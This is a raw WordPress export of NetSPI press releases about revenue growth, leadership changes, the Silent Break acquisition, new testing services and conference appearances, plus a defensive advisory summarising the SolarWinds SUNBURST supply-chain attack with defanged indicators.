NetSPI is the leader in enterprise penetration testing and attack surface management. We are proud to partner with nine of the top 10 U.S. banks, three of the world’s five largest health care companies, the largest global cloud providers, and many of the Fortune® 500. Our experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces. We uniquely deliver Penetration Testing as a Service (PTaaS) through our Resolve platform. Clients love PTaaS for the simplicity of scoping new engagements, viewing their testing results in real-time, orchestrating remediation, and the ability to perform always-on continuous testing. We find vulnerabilities that others miss and deliver clear, actionable recommendations allowing our customers to find, track, and fix their vulnerabilities faster. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of growth equity firm Sunstone Partners. Follow us on Facebook, Twitter, and LinkedIn.
[post_title] => NetSPI Relaunches Red Team Toolkit
[post_excerpt] => NetSPI’s toolkit for covert adversary simulations is now available to enterprise red teams with new features and functionality.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => netspi-relaunches-red-team-toolkit
[to_ping] =>
[pinged] =>
[post_modified] => 2022-12-16 10:51:00
[post_modified_gmt] => 2022-12-16 16:51:00
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?post_type=news&p=21247
[menu_order] => 301
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[71] => WP_Post Object
(
[ID] => 23016
[post_author] => 91
[post_date] => 2021-01-26 07:00:06
[post_date_gmt] => 2021-01-26 07:00:06
[post_content] =>
Following a successful year, NetSPI promotes Aaron Shilts to CEO while co-founder Deke George assumes a new role on the Board of Directors.
Minneapolis, Minnesota – NetSPI, the leader in enterprise security testing and vulnerability management, achieved 35% organic revenue growth in fiscal year 2020, added over 150 new clients, and expanded its team to more than 200 employees. NetSPI’s Penetration Testing as a Service (PTaaS) delivery model, core service expansion, and Silent Break Security acquisition all contributed to its strong growth. Since 2017, NetSPI has tripled its topline revenue while remaining profitable.
As NetSPI looks forward to 2021, the company has promoted Aaron Shilts to President and CEO and Charles Horton to COO. NetSPI co-founder Deke George will assume a new role as Chairman on the Board of Directors and remain actively involved in the company.
“2020 was full of challenges, not only for our team, but also for our clients. I’m proud of the rapid growth this team has achieved and how we’ve adapted and scaled to support our clients at a time when people and organizations are more vulnerable,” said Shilts. “More businesses recognize the foundational importance of secure software. As such, I anticipate that NetSPI’s core business in application security, vulnerability management, and cloud testing will experience even higher demand in 2021.”
Achievements that contributed to NetSPI’s 2020 success include,
Penetration Testing as a Service (PTaaS) Powered by Resolve™: PTaaS enables customers to simplify the scoping of new engagements, view their testing results in real-time, orchestrate faster remediation, perform always-on continuous testing, and more – all through the Resolve vulnerability management and orchestration platform.
Cloud Security Testing Expansion: NetSPI expanded its industry-leading cloud penetration testing services to include the AWS, Azure, Google, and Oracle cloud environments, for both point-in-time and continuous testing.
Strategic Advisory Services: This new consulting service builds and improves application security programs. The core functions of Strategic Advisory Services include program benchmarking, roadmap development, and security metrics.
Static Application Security Testing (SAST) and Secure Code Review (SCR): NetSPI enhanced its SAST and SCR services to help development teams establish a more strategic approach to building secure applications and identifying vulnerabilities earlier in the software development lifecycle (SDLC).
Silent Break Security Acquisition: NetSPI acquired Silent Break Security to complete its offensive cybersecurity and attack surface management offerings. Silent Break Security’s manual testing team, proprietary Adversary Simulation and Red Team Toolkit software, and enterprise clients improve NetSPI’s ability to scale up vulnerability management programs to meet client needs.
NetSPI Thought Leadership: In 2020, NetSPI spotlighted its roster of technology and management experts, creating a breadth of thought leadership content across several platforms including the executive and technical blogs, webinars, downloadable resources, and the Agent of Influence podcast.
Philanthropic Activities: NetSPI became a sponsor for Change Starts With Me, a grassroots movement working to rebuild communities impacted by social, health, and economic crises. The company also continues to work closely with the University of Minnesota Masonic Children’s Hospital and raised funds to support World Central Kitchen, MasksOn.org, and Northside Funders Group.
"Technology innovation is what we do best. It’s the foundation on which we built NetSPI,” said Deke George. “This was evident over the past 12 months, and I believe NetSPI is leading a revolutionary shift in the way penetration testing and vulnerability management is performed.”
“We come into the new year with incredible momentum and continued focus on delivering an exceptional client experience,” Shilts said. “In 2021 we will extend the intelligence and automation features of our Resolve platform. With data from over 80 million vulnerabilities, we give our customers access to the most robust risk scoring system on the market, the power to predict the likelihood of vulnerabilities in their environment, and the ability to automatically run adversary simulations across their entire attack surface.”
Join NetSPI’s mailing list to be the first to receive company, product, and services updates. Sign up here.
About NetSPI
NetSPI is the leader in enterprise security testing and vulnerability management. We are proud to partner with nine of the top 10 U.S. banks, three of the world’s five largest health care companies, the largest global cloud providers, and many of the Fortune® 500. Our experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces. We uniquely deliver Penetration Testing as a Service (PTaaS) through our Resolve platform. Clients love PTaaS for the simplicity of scoping new engagements, viewing their testing results in real-time, orchestrating remediation, and the ability to perform always-on continuous testing. We find vulnerabilities that others miss and deliver clear, actionable recommendations allowing our customers to find, track, and fix their vulnerabilities faster. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of growth equity firm Sunstone Partners. Follow us on Facebook, Twitter, and LinkedIn.
Media Contacts:
Jean Hill, Maccabee PR for NetSPI
jean@maccabee.com
(612) 294-3154
Tori Norris, NetSPI
victoria.norris@netspi.com
(630) 258-0277
[post_title] => NetSPI Celebrates 35% Organic Revenue Growth in 2020
[post_excerpt] => Following a successful year, NetSPI promotes Aaron Shilts to CEO while co-founder Deke George assumes a new role on the Board of Directors.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => celebrates-35-percent-organic-revenue-growth-in-2020
[to_ping] =>
[pinged] =>
[post_modified] => 2022-12-16 10:51:02
[post_modified_gmt] => 2022-12-16 16:51:02
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?post_type=news&p=21134
[menu_order] => 306
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[72] => WP_Post Object
(
[ID] => 20716
[post_author] => 91
[post_date] => 2020-12-15 09:41:57
[post_date_gmt] => 2020-12-15 09:41:57
[post_content] =>
As we write this post, you’ve likely heard about the FireEye and U.S. government agency breaches that occurred over the past week. We know now the breaches have been linked back to a supply chain attack on the SolarWinds Orion Platform, a software platform that manages IT operations and products for over 300,000 organizations, including over 425 of the Fortune 500, all ten of the top U.S. telecommunications companies, all five branches of the U.S. Military, all five of the top U.S. accounting firms, and many, many more.
While FireEye, the U.S. Treasury, and National Telecommunications and Information Administration (NTIA) were the first to report a security breach, the breadth of SolarWinds’ customer base is an indicator that the breaches are seemingly the tip of the iceberg.
For the sake of information sharing, here is an overview of the attacks, immediate steps you can take to identify whether you have fallen victim, and tips for protecting your organization as communicated by FireEye, SolarWinds, and NetSPI. For the full technical deep-dive, we highly recommend the FireEye blog post.
On December 13, SolarWinds issued a security advisory alerting to a manual supply chain attack on its Orion Platform software builds for versions 2019.4 HF 5 through 2020.2.1, released between March 2020 and June 2020.
FireEye discovered the attack and suggests it is a state-sponsored global intrusion campaign by a group named UNC2452 - though many industry experts are attributing the attack to APT29, a group of hackers associated with the Russian Foreign Intelligence Service.
Attack Origin: UNC2452 gained access to victims via trojan-based updates to SolarWinds’ Orion IT monitoring and management software, distributing malware called SUNBURST. Multiple trojanized updates were digitally signed and subsequently deployed via this URL: hxxps://downloads.solarwinds[.]com/solarwinds/CatalogResources/Core/2019.4/2019.4.5220.20574 /SolarWinds-Core-v2019.4.5220-Hotfix5.msp. The downloaded file is a standard Windows Installer Patch file, which includes the trojanized SolarWinds.Orion.Core.BusinessLayer.dll component.
How It Works: The digitally signed SolarWinds.Orion.Core.BusinessLayer.dll file is a component of the Orion Improvement Program (OIP) software framework that contains a backdoor that communicates with third party servers via the HTTP protocol. The malicious DLL gets loaded into the legitimate SolarWinds.BusinessLayerHost.exe or SolarWinds.BusinessLayerHostx64.exe executables and can run dormant for up to two weeks before beaconing to a subdomain of avsvmcloud[.]com. To avoid possible detection, the C2 traffic between the beaconing server and the victim is made to resemble legitimate SolarWinds communications. This includes HTTP GET, HEAD, POST and PUT requests with JSON payloads in their bodies. The HTTP responses from the C2 server communicating with the victim contain XML data that resembles .NET assembly data used for normal SolarWinds operations. Within the XML, however, is obfuscated command information that is deobfuscated and then executed by the SolarWinds process on the victim’s system.
Impact/Result: Following the initial compromise and deployment of SUNBURST, a variety of more capable payloads can be deployed to facilitate lateral movement and data theft. Common payloads include TEARDROP and Cobalt Strike BEACON, both of which can be loaded into memory to improve stealth of operations.
Known breaches include:
FireEye: On December 8, FireEye communicated a state-sponsored security breach through which the attackers accessed FireEye’s Red Team assessment tools used to test customers’ security. Following the breach, the company made its list of countermeasures public. FireEye has now confirmed that this attack was a result of the SolarWinds Orion supply chain attack.
U.S. Treasury and the National Telecommunications and Information Administration (NTIA): On December 13, Reuters reported that Russian-associated hackers broke into the U.S. Treasury and Commerce department’s Microsoft 365 software and have been monitoring internal email traffic. Following a National Security Council meeting at the White House over the weekend, the Cybersecurity and Infrastructure Security Agency (CISA) issued an emergency directive for all federal agencies to power down SolarWinds Orion.
Organizations are frantically working to figure out if they have been a victim of the attack and how to protect themselves. Here are the immediate steps to take, according to SolarWinds, FireEye, and NetSPI’s team of offensive security experts:
First, determine if SolarWinds Orion is deployed within your environment. If unsure, NetSPI recommends performing a network scan to identify the Orion agent. For example, this can be performed with Nmap by running: nmap --open -sT -p 17778,17790 x.x.x.x/xx, where x.x.x.x is the network address and xx is the subnet mask. If the Orion agent is found, follow SolarWinds’ recommendations.
SolarWinds recommends customers upgrade to Orion Platform version 2020.2.1 HF 1 as soon as possible. It also asks customers with any of the products listed on the security advisory for Orion Platform v2019.4 HF 5 to update to 2019.4 HF 6. Additional suggestions can be found in the security advisory. While upgrading Orion will prevent future backdoored deployments from occurring, it will not remediate the potentially infected deployments that have already taken place via the Orion Platform.
Additionally, FireEye provides a list of recommendations including its signatures to detect this threat actor and supply chain attack. Specific details on the YARA, Snort, and ClamAV signatures can be found on FireEye’s public GitHub page.
Get in Touch: To connect with NetSPI for support with testing efforts related to the SolarWinds Orion attack, email info@NetSPI.com.
[post_title] => FireEye, SolarWinds, U.S. Treasury: What’s Happening in the Cyber Security World Right Now?
[post_excerpt] => As we write this post, you’ve likely heard about the FireEye and U.S. government agency breaches that occurred over the past week
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => fireeye-solarwinds-us-treasury-whats-happening-in-the-cyber-security-world-right-now
[to_ping] =>
[pinged] =>
[post_modified] => 2021-05-04 17:03:39
[post_modified_gmt] => 2021-05-04 17:03:39
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=20716
[menu_order] => 316
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[73] => WP_Post Object
(
[ID] => 20550
[post_author] => 91
[post_date] => 2020-12-02 07:00:59
[post_date_gmt] => 2020-12-02 07:00:59
[post_content] =>
With the acquisition of Silent Break Security, NetSPI will expand and enhance adversary simulation software and services.
Minneapolis, Minnesota – NetSPI, the leader in enterprise security testing and vulnerability management, today announced its acquisition of Silent Break Security, a Utah-based security testing firm which specializes in network and application testing, red teaming, and adversary simulation. Through this acquisition, NetSPI will broaden its footprint to create a complete package for offensive cyber security and attack surface management. With the integration of Silent Break Security’s manual testing team, along with their proprietary software platforms and toolsets, NetSPI will improve its ability to scale up vulnerability management programs to meet client needs.
“It’s our vision to secure the world’s attack surfaces with brilliant people and disruptive technology. The Silent Break Security team is the perfect complement to our strong culture and its software stack a natural fit for helping us drive innovation and leverage technology as a force multiplier,” said Aaron Shilts, President and COO of NetSPI. “I am very excited about the opportunity this presents our team. By leveraging the skills that Brady built in his Silent Break Security team, I believe NetSPI has an opportunity to disrupt the penetration testing industry.”
“It is rare to find two organizations that align so closely from a mission, vision, values, and culture perspective,” added Brady Bloxham, Founder and CEO of Silent Break Security. “Both organizations have cultures of high performance, innovation, and agility. Individually, NetSPI and Silent Break have been working toward many of the same goals and, now together, we will become a much greater force to be reckoned with.”
The combined NetSPI and Silent Break team will provide a complete package for offensive security through the following core strategies:
Industry Leading Talent: NetSPI’s expert penetration testers conduct over 150,000 hours of testing each year and deliver technical and thought leadership content to the industry. The addition of Silent Break Security’s team, many with U.S. Department of Defense (DoD) experience, will position the combined company as the industry’s strongest penetration testing provider.
Technology Innovation: At the foundation of the acquisition is innovation through proprietary technology. Acquiring Silent Break Security and its technology –adversary simulation software (Silent Break Central), Red Team Toolkit, among other tools – with the goal of integrating these into NetSPI’s Resolve™ vulnerability management and orchestration software, will enable the company to consistently find vulnerabilities that others miss, accelerate remediation, provide always-on continuous testing, and simplify the entire testing process.
Focus on Training: The commitment to quality is evident in each organization’s emphasis on continuous professional development and training programs for employees and client security teams. Silent Break Security will bring its in-depth training programs on malware development, adversary simulations, and offensive machine learning to NetSPI employees and clients to complement NetSPI’s acclaimed NetSPI University employee training program.
Penetration Testing as a Service (PTaaS): The acquired technologies and expertise will allow NetSPI to optimize its core penetration testing service: PTaaS. Automated scanning, real-time reporting, and streamlined remediation processes offered through PTaaS will give the manual testing team more time to focus on the difficult, hard-to-find vulnerabilities that only humans can find. Silent Break’s software fits perfectly into our strategy to deliver always-on attack surface management giving Resolve customers the ability to run internal automated red team “plays” throughout the year.
Brady Bloxham, Founder and CEO of Silent Break Security will become NetSPI’s Chief Technology Officer (CTO). Silent Break Security operations and team members will remain in Lehi, Utah and throughout the U.S.
To learn more about the acquisition of Silent Break Security, connect with the NetSPI team by contacting Heather Rubash (heather.rubash@netspi.com; (612) 385-3006). Keep up to date with NetSPI’s latest news: visit netspi.com.
Watch NetSPI's special announcement from President and COO, Aaron Shilts
NetSPI is the leader in enterprise security testing and vulnerability management. We are proud to partner with eight of the top 10 U.S. banks, three of the world’s five largest health care companies, the largest global cloud providers, and many of the Fortune® 500. Our experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces. We uniquely deliver Penetration Testing as a Service (PTaaS) through our Resolve platform. Clients love PTaaS for the simplicity of scoping new engagements, viewing their testing results in real-time, orchestrating remediation, and the ability to perform always-on continuous testing. We find vulnerabilities that others miss and deliver clear, actionable recommendations allowing our customers to find, track, and fix their vulnerabilities faster. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of growth equity firm Sunstone Partners. Follow us on Facebook, Twitter, and LinkedIn.
Media Contacts: Jean Hill, Maccabee PR for NetSPI jean@maccabee.com (612) 294-3154
Florindo Gallicchio and Robert Richardson bring a combined 50 years of cyber security experience to NetSPI.
Minneapolis, Minnesota – NetSPI, the leader in enterprise security testing and vulnerability management, today announced Florindo Gallicchio has joined as Managing Director and Robert Richardson has been promoted to Vice President of Customer Success. Expanding the leadership team is a principle component of NetSPI’s strategy to drive customer growth, program success, and return on investment (ROI) of penetration testing.
“Finding vulnerabilities that other pentesters miss, making reporting easier to digest and act upon, and streamlining our customer engagements through the Resolve™ vulnerability management platform are key areas of focus for our team,” said Aaron Shilts, President at NetSPI. “The growth of our leadership team gives us the opportunity to evolve and expand our services, providing customers peace-of-mind that they’re working with the best security testing and vulnerability management team on the market today.”
Cumulatively, Gallicchio and Richardson bring half a century of cyber security excellence to NetSPI, where they will help customers align security strategies to business goals.
Gallicchio is a senior risk management and information security practitioner with over 30 years of experience in building and running cyber security programs to securely manage the business while also achieving and maintaining compliance to regulatory and industry requirements. As Managing Director at NetSPI, he will be a strategic advisor to executives, boards of directors, and technology staff, helping them understand the role of security as a business strategy. Prior to joining NetSPI, Gallicchio was the CISO at a global advisory investment firm in New York City. He began his career with the National Security Agency (NSA) while serving in the U.S. Navy, where in 10 years of service he worked in signals and communications intelligence collection and systems exploitation.
Richardson has more than 20 years of experience as a builder of people, processes, and sales enablement that support and drive sales growth. Richardson is being promoted to Vice President of Customer Success at NetSPI, and will focus on people leadership, personnel development, and operational efficiency. Prior to NetSPI, Richardson built a professional services process and delivery capability that resulted in 150% growth over two years as Director of Strategic Staffing and the Program Management Office (PMO) at Optiv Security. Prior to the merger that formed Optiv, Richardson managed projects at FishNet Security.
“Gallicchio and Richardson bring new perspectives to the table,” added Deke George, Founder and CEO of NetSPI. “Notably, Gallicchio’s experience on the client side as a financial services CISO and his time serving in the U.S. Navy coupled with Richardson’s personnel development track record and ability to scale operations will allow NetSPI to further improve our customers’ vulnerability management programs. Having two of the industry’s best minds on our roster is a crucial part of our mission to provide invaluable pentesting services and counsel to our clients – and continue to stay one step ahead of adversaries.”
To learn more about NetSPI’s efforts to drive customer success, visit the company website to hear first-hand customer success stories or connect with the NetSPI team at info@netspi.com or call: (612) 465-8880.
About NetSPI
NetSPI is the leader in enterprise security testing and vulnerability management. We are proud to partner with seven of the top 10 U.S. banks, three of the world’s five largest health care companies, the largest global cloud providers, and many of the Fortune® 500. Our experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces. We uniquely deliver Penetration Testing as a Service (PTaaS) through our Resolve platform. Clients love PTaaS for the simplicity of scoping new engagements, viewing their testing results in real-time, orchestrating remediation, and the ability to perform always-on continuous testing. We find vulnerabilities that others miss and deliver clear, actionable recommendations allowing our customers to find, track and fix their vulnerabilities faster. Follow us on Facebook, Twitter, and LinkedIn.
Media Contact:
Tori Norris, Maccabee PR for NetSPI
tori@maccabee.com
612-294-3100
[post_title] => NetSPI Adds to Leadership Team to Support Continued Focus on Customer Success
[post_excerpt] => Florindo Gallicchio and Robert Richardson bring a combined 50 years of cyber security experience to NetSPI.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => netspi-adds-to-leadership-team-to-support-continued-focus-on-customer-success
[to_ping] =>
[pinged] =>
[post_modified] => 2021-04-14 06:52:43
[post_modified_gmt] => 2021-04-14 06:52:43
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?post_type=news&p=19939
[menu_order] => 335
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[75] => WP_Post Object
(
[ID] => 19512
[post_author] => 91
[post_date] => 2020-08-03 07:00:59
[post_date_gmt] => 2020-08-03 07:00:59
[post_content] =>
During the Black Hat 2020 Virtual Conference, NetSPI, a leader in enterprise security testing and vulnerability management, will provide a fresh perspective on optimizing pentesting and application security (AppSec) programs. Today, there are more software-based solutions than ever before. From rising dependency on smartphone applications to the growing remote workforce increasing the usage of cloud-based software, reliance on software continues to grow. This means more AppSec security tools and automation have become available – and, in-turn, an overwhelming number of AppSec methodologies and approaches to follow. To navigate the complex security considerations, NetSPI is working to change the way organizations think about AppSec by embracing security throughout the development lifecycle.
Who:
Deke George, CEO, NetSPI
Aaron Shilts, President and COO, NetSPI
Nabil Hannan, Managing Director, NetSPI
Jake Reynolds, Product Manager, NetSPI
What:
On Wednesday, August 5, at 11:20–11:40am PT, NetSPI Managing Director Nabil Hannan and Product Manager Jake Reynolds will host a session titled, Extreme Makeover: AppSec Edition. During the session, attendees will learn how leading organizations use different discovery techniques as part of their AppSec program, understand strengths and weaknesses of common AppSec vulnerability discovery technologies and adopt techniques that make security frictionless for your developers as they embrace a DevSecOps culture. Additionally, they will discover how functional your application security program can be with a “makeover” to:
Enhance reporting to empower leadership to optimize AppSec programs
Improve vulnerability ingestion, correlation, and enrichment
Increase speed to remediation
The NetSPI team will have a virtual exhibitor booth in the Black Hat Business Hall. Schedule a briefing to hear the latest company updates and explore NetSPI’s new products and services, including:
Strategic Advisory Services: In June 2020, NetSPI revealed a new application-centric approach to its Strategic Advisory Services to help organizations gain a competitive edge through a formalized, business-objective driven, and mature application security program.
Pentesting as a Service (PTaaS): Launched in 2020, NetSPI’s PTaaS delivery model puts customers in control of their pentests and their data, enabling them to simplify the scoping of new engagements, view their testing results in real time, orchestrate quicker remediation, and adding the ability to perform always-on continuous testing.
When:
Virtual Session: Wednesday, August 5, 11:20–11:40am PST
Black Hat 2020 Virtual Conference: August 1-6, 2020
Where:
Attend the virtual session, Extreme Makeover: AppSec Edition, online here.
Stop by NetSPI’s virtual booth by searching for NetSPI in the Black Hat event portal.
Media:
Virtual briefings with the NetSPI team available upon request. To attend the virtual session on August 5, register for a free Black Hat Business Pass.
Contact:
Tori Norris
Maccabee Public Relations on behalf of NetSPI
tori@maccabee.com, (612) 294-3100
[post_title] => NetSPI to Help Black Hat USA 2020 Attendees View Penetration Testing and Application Security Through a New Lens
[post_excerpt] => During the Black Hat 2020 Virtual Conference, NetSPI will provide a fresh perspective on optimizing pentesting and application security (AppSec) programs.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => netspi-help-black-hat-usa-2020-attendees-view-penetration-testing-application-security-through-new-lens
[to_ping] =>
[pinged] =>
[post_modified] => 2021-04-14 06:52:48
[post_modified_gmt] => 2021-04-14 06:52:48
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?post_type=news&p=19512
[menu_order] => 355
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[76] => WP_Post Object
(
[ID] => 19437
[post_author] => 91
[post_date] => 2020-07-28 07:00:25
[post_date_gmt] => 2020-07-28 07:00:25
[post_content] =>
The new services are designed to identify application security vulnerabilities earlier in the software development life cycle.
Minneapolis, Minnesota – To mitigate possible security vulnerabilities early in the fast-paced software development life cycle process, today NetSPI, the leader in enterprise security testing and vulnerability management, launched Static Application Security Testing (SAST) and Secure Code Review (SCR) services to aid application and software development teams in establishing a more strategic approach to building secure applications. Key to NetSPI’s multi-level secure code review services involving SAST and SCR is a thorough inspection of source and compiled code to ensure security risks are eliminated before software is deployed to production, at which time the cost of remediation could increase exponentially.
“With Continuous Integration/Continuous Deployment more and more becoming the backbone of the modern DevOps environment, it’s more important than ever to detect and address vulnerabilities through Static Application Security Testing and Source Code Review processes, a service that is complementary to an organization’s penetration testing efforts,” said Nabil Hannan, managing director at NetSPI. “Both testing functions enable more comprehensive vulnerability detection and, in many cases, identify vulnerabilities that are not possible to discover during dynamic testing and analysis.”
NetSPI’s SAST and SCR services are offered in various engagement structures giving application and software development teams options to leverage the appropriate level of testing depth to detect, validate, and resolve security issues based on the business criticality and risk profile of their applications. The services are also a solution to adhere to application development compliance standards, including PCI DSS and HIPAA. NetSPI’s SAST and SCR offerings include:
Static Application Security Testing (SAST)—A static analysis performed with a combination of commercial, open source, and proprietary SAST tools, resulting in an assessment report from NetSPI that describes found vulnerabilities and actionable remediation guidance. Additionally, NetSPI offers a streamlined, more economical SAST service which focuses only on testing around the Open Web Application Security Project® (OWASP) Top 10 vulnerabilities.
Static Application Security Testing (SAST): Triaging—As an augmentation to an organization’s internal use of SAST tools in Application Security Programs, NetSPI offers triage services. By analyzing the data and assigning degrees of urgency on behalf of the security teams, NetSPI can validate the exploitability of vulnerabilities to remove any false positive findings, allowing development teams the time to focus exclusively on remediation.
Secure Code Review (SCR)—Building off the SAST offerings, NetSPI’s SCR offering employs cyber security experts to review underlying frameworks and libraries that are being leveraged to build the application. From there, manual testers identify vulnerabilities that automated scanners cannot detect, such as complex injection attacks, insecure error handling as well as authentication and authorization issues. Additionally, NetSPI offers a streamlined, more economical SCR service which focuses only on reporting around the Open Web Application Security Project® (OWASP) Top 10 vulnerabilities.
Unique to NetSPI is its instructor-led training program around secure coding and remediation for development teams, made available to clients after completion of Static Application Security Testing (SAST) or Secure Code Review (SCR) engagements. Available for up to a class size of 20, NetSPI’s one-day training details the top five categories of vulnerabilities identified in the SAST or SCR engagement and provides insights specific to that organization as well as remediation or mitigation techniques.
“We’ve seen a movement to the left, in terms of prioritizing SCR earlier in the SDLC process as Application Security Programs have evolved,” said Hannan. “We support this strategic approach to security as it is critical to identify and remediate vulnerabilities, and in some cases even prevent them, during the software development phase.”
Learn more about Secure Code Review (SCR) and Static Application Security Testing (SAST) from NetSPI online at netspi.com/security-testing/secure-code-review/ or email heather.rubash@netspi.com to schedule an introductory call with Nabil Hannan, Managing Director at NetSPI.
About NetSPI
NetSPI is the leader in enterprise security testing and vulnerability management. We are proud to partner with seven of the top 10 U.S. banks, three of the world’s five largest health care companies, the largest global cloud providers, and many of the Fortune® 500. Our experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces. We uniquely deliver Penetration Testing as a Service (PTaaS) through our Resolve™ platform. Clients love PTaaS for the simplicity of scoping new engagements, viewing their testing results in real-time, orchestrating remediation, and the ability to perform always-on continuous testing. We find vulnerabilities that others miss and deliver clear, actionable recommendations allowing our customers to find, track and fix their vulnerabilities faster. Follow us on Facebook, Twitter, and LinkedIn.
Contact:
Tori Norris
tori@maccabee.com
612-294-3100
[post_title] => NetSPI Brings Scale, Agility, and Speed to Static Application Security Testing and Secure Code Review
[post_excerpt] => On July 28, 2020, we launched Static Application Security Testing (SAST) and Secure Code Review (SCR) services to aid application and software development teams in establishing a more strategic approach to building secure applications.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => netspi-brings-scale-agility-speed-static-application-security-testing-secure-code-review
[to_ping] =>
[pinged] =>
[post_modified] => 2021-04-14 06:52:53
[post_modified_gmt] => 2021-04-14 06:52:53
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?post_type=news&p=19437
[menu_order] => 358
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[77] => WP_Post Object
(
[ID] => 19238
[post_author] => 91
[post_date] => 2020-06-30 07:00:16
[post_date_gmt] => 2020-06-30 07:00:16
[post_content] =>
The new offering will help CISOs and software developers/engineers navigate application security to promote cyber security program maturity.
Minneapolis, Minnesota – Today, NetSPI, the leader in enterprise security testing and vulnerability management, revealed a new application-centric approach to its Strategic Advisory Services to help organizations gain a competitive edge through a formalized, well-balanced, business-objective driven, and mature application security program. While advisory services are not new to NetSPI, the company saw an opportunity to use its breadth of knowledge in security testing to help define and guide organizations to implement application security into broader threat and vulnerability management programs.
Through NetSPI’s Strategic Advisory Services, the company will share tangible and data-driven guidance on building or improving application security strategies and other software security initiatives. The three core functions and benefits of the new offering include:
Program Benchmarking: Using real-world data, NetSPI’s program benchmarking services enable IT and security teams to evaluate program maturity against empirical data from the industry, measure and track the progress of security efforts objectively over time, compare security efforts with peers in the same business vertical, and ultimately help organizations adapt to current security best practices. Each benchmarking report will yield an evaluation of the current state of a company’s Application Security Program with details around focus areas for improvement along with areas that are currently addressing the organization’s Application Security needs effectively.
Roadmap Development: Commonly performed alongside benchmarking, NetSPI’s roadmapping services define the future state of application security programs and the strategic path forward. The program roadmap will guide security stakeholders to determine the best approach to optimize application security investments by identifying unique organizational needs, leveraging established frameworks, and performing penetration tests to allow for early discovery of the types of vulnerabilities that exist while determining realistic goals and defining an appropriate timeline around key milestones.
Security Metrics Development: Metrics, unlike raw data or measurements, can help answer specific business questions and help teams track progress. They are a critical component for measuring ROI of security programs, but organizations often lack the proper metrics to evaluate how application security efforts are influencing and helping achieve its business objectives. With NetSPI’s security metrics services, organizations will work with a consultant to define metrics that can be automated by leveraging existing business processes and raw data to provide necessary context to make effective business decisions.
“Given how fast application development techniques and methodologies are transforming, companies need to ensure that their security practices are staying current with the ever-evolving pressures around compliance and governance, software deployment, DevOps, Software Development Lifecycle (SDLC), and training,” said Nabil Hannan, managing director at NetSPI. “Understanding the current level of maturity and developing a data-driven plan to evolve your application security program is key to the success of your organization’s security efforts.”
Learn more about Strategic Advisory Services from NetSPI online at Strategic Advisory or email heather.rubash@netspi.com to schedule an introductory call with Nabil Hannan, Managing Director at NetSPI.
About NetSPI
NetSPI is the leader in enterprise security testing and vulnerability management. We are proud to partner with seven of the top 10 U.S. banks, the largest global cloud providers, and many of the Fortune® 500. Our experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces. We uniquely deliver Penetration Testing as a Service (PTaaS) through our Resolve™ platform. Clients love PTaaS for the simplicity of scoping new engagements, viewing their testing results in real-time, orchestrating remediation, and the ability to perform always-on continuous testing. We find vulnerabilities that others miss and deliver clear, actionable recommendations allowing our customers to find, track, and fix their vulnerabilities faster. Follow us on Facebook, Twitter, and LinkedIn.
[post_title] => NetSPI Reimagines Strategic Advisory Services, With a Focus on Application Security
[post_excerpt] => On June 30, 2020, we revealed a new application-centric approach to its Strategic Advisory Services to help organizations gain a competitive edge through a formalized, well-balanced, business-objective driven, and mature application security program.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => netspi-reimagines-strategic-advisory-services-focus-application-security
[to_ping] =>
[pinged] =>
[post_modified] => 2021-04-14 06:52:58
[post_modified_gmt] => 2021-04-14 06:52:58
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?post_type=news&p=19238
[menu_order] => 364
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[78] => WP_Post Object
(
[ID] => 17790
[post_author] => 91
[post_date] => 2020-03-17 07:00:33
[post_date_gmt] => 2020-03-17 07:00:33
[post_content] =>
On March 17, 2020, we shared the below communication with our customers in regards to COVID-19, and wanted to make it available to the broader community.
Minneapolis, Minnesota – During these unprecedented times, our team wanted to reach out, first and foremost, to wish you continued health and safety. In addition, we wanted to share how we are responding to the evolving COVID-19 situation through ongoing business continuity planning and our flexible approach to move forward with your penetration testing while also protecting your critical infrastructure.
NetSPI's Business Continuity Planning
We run business continuity planning exercises regularly, and recently performed a special exercise to simulate additional work-from-home load. All systems performed well in this test and validated our resiliency in a situation where all physical NetSPI offices are closed. In addition, our Resolve™ platform is crucial to our resiliency in that it allows our team of testers and project managers to communicate seamlessly with your team ensuring you can prioritize and fix your vulnerabilities faster.
Flexibility to Protect Your Critical Infrastructure
NetSPI is extremely flexible and our testing is built to ensure we do not impact your critical infrastructure. As such, we can:
Perform off-hours testing.
Modify the configuration of our tools (tweak our systems to go lower and slower than normal).
Conduct testing in QA and dev environments for pre-production application testing.
Employee Health and Travel
